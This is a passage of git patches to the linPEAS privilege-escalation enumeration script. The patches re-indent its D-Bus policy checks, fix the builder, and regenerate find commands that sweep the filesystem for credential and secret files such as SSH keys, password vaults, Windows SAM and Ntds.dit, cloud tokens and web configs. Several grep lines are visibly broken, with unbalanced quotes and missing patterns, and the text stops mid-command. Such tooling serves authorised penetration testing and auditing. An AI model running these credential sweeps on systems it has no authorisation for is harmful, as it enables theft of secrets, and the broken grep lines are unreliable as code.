weak policies in D-Bus config files print_2title "D-Bus config files" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" if [ "$PSTORAGE_DBUS" ]; then -printf "%s\n" "$PSTORAGE_DBUS" | while read d; do + printf "%s\n" "$PSTORAGE_DBUS" | while read d; do for f in $d/*; do - if ! [ "$IAMROOT" ] && [ -w "$f" ]; then + if ! [ "$IAMROOT" ] && [ -w "$f" ]; then echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g" - fi + fi - genpol=$(grep "" "$f" 2>/dev/null) - if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi + genpol=$(grep "" "$f" 2>/dev/null) + if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi - userpol=$(grep "/dev/null | grep -v "root") - if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #for g in `groups`; do - # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi - #done - grppol=$(grep "/dev/null | grep -v "root") - if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + userpol=$(grep "/dev/null | grep -v "root") + if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi + #for g in `groups`; do + # if [ "`grep \"\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi + #done + grppol=$(grep "/dev/null | grep -v "root") + if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi - #TODO: identify allows in context="default" + #TODO: identify allows in context="default" done -done + done fi echo "" @@ -289,15 +290,15 @@ print_2title "D-Bus Service Objects list" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#d-bus" dbuslist=$(busctl list 2>/dev/null) if [ "$dbuslist" ]; then -busctl list | while read line; do + busctl list | while read line; do echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"; if ! echo "$line" | grep -qE "$dbuslistG"; then - srvc_object=$(echo $line | cut -d " " -f1) - srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') - if [ "$srvc_object_info" ]; then + srvc_object=$(echo $line | cut -d " " -f1) + srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ') + if [ "$srvc_object_info" ]; then echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED}," + fi fi - fi -done + done else echo_not_found "busctl" fi \ No newline at end of file diff --git a/linPEAS/builder/src/linpeasBaseBuilder.py b/linPEAS/builder/src/linpeasBaseBuilder.py index b7a7ea2..ec58a1e 100644 --- a/linPEAS/builder/src/linpeasBaseBuilder.py +++ b/linPEAS/builder/src/linpeasBaseBuilder.py @@ -25,7 +25,7 @@ class LinpeasBaseBuilder: linpeas_part = file.read() checks.append(name_check) - self.linpeas_base += f"\nif echo $CHECKS | grep -q {name_check};\n" + self.linpeas_base += f"\nif echo $CHECKS | grep -q {name_check}; then\n" self.linpeas_base += f'print_title "{name}"\n' self.linpeas_base += linpeas_part self.linpeas_base += f"\nfi\necho ''\necho ''\n" From 110de1f2d2c0a9acc476961d8c701fc31d9bbc94 Mon Sep 17 00:00:00 2001 From: CI-linpeas-ubuntu <> Date: Sat, 18 Dec 2021 22:19:49 +0000 Subject: [PATCH 3/5] linpeas.sh auto update --- linPEAS/linpeas.sh | 727 +++++++++++++++++++++++---------------------- 1 file changed, 364 insertions(+), 363 deletions(-) diff --git a/linPEAS/linpeas.sh b/linPEAS/linpeas.sh index fc368bb..47c40df 100755 --- a/linPEAS/linpeas.sh +++ b/linPEAS/linpeas.sh @@ -1086,145 +1086,145 @@ if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks || echo $CHECKS | grep -q IntFil CONT_THREADS=0 # FIND ALL KNOWN INTERESTING SOFTWARE FILES - FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"system.d\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"bind\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"bind\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"bind\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_BIN=`eval_bckgrd "find /bin -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CACHE=`eval_bckgrd "find /.cache -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name 